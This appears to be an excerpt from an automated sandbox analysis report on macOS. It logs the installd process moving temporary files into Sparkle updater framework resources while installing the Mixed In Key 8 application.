Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/uk.lproj/.BC.T_MCNUlS -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/uk.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/zh_CN.lproj/.BC.T_TRyhd4 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/zh_CN.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/es.lproj/.BC.T_TYkkfU -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/es.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/is.lproj/.BC.T_hwNqA7 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/is.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/sl.lproj/.BC.T_1aK6WS -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/sl.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/pt_BR.lproj/.BC.T_yZZQIh -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/pt_BR.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/da.lproj/.BC.T_dJnfDr -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/da.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/it.lproj/.BC.T_wP55BN -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/it.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/sk.lproj/.BC.T_821GIZ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/sk.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/pt_PT.lproj/.BC.T_Baw0Yf -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/pt_PT.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/sv.lproj/.BC.T_0ACJYj -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/sv.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/cs.lproj/.BC.T_PBJxHJ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/cs.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ko.lproj/.BC.T_8nd2UP -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ko.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/no.lproj/.BC.T_Q03Uwc -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/no.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/hu.lproj/.BC.T_pBNyzP -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/hu.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/tr.lproj/.BC.T_Ea07yZ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/tr.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/pl.lproj/.BC.T_nkJhuA -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/pl.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/zh_TW.lproj/.BC.T_fp0h2f -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/zh_TW.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ru.lproj/.BC.T_nKcMMT -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ru.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/cy.lproj/.BC.T_oCTfAy -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/cy.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/.BC.T_mRVoBE -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/SUStatus.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/fr.lproj/.BC.T_veZ1xl -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/fr.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/fi.lproj/.BC.T_Xkk9ca -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/fi.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/id.lproj/.BC.T_SSt3KG -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/id.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/nl.lproj/.BC.T_QLoFEJ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/nl.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/th.lproj/.BC.T_EYzML7 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/th.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ro.lproj/.BC.T_NRobRg -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ro.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ca.lproj/.BC.T_CuBFmS -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ca.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/.BC.T_x9fPaE -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/Sparkle.icns	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/.BC.T_XtQ91r -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Info.plist	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/.BC.T_W3QRFO -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/PkgInfo	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/.BC.T_8n8iSm -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/.BC.T_xKOUP2 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/.BC.T_IF71My -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
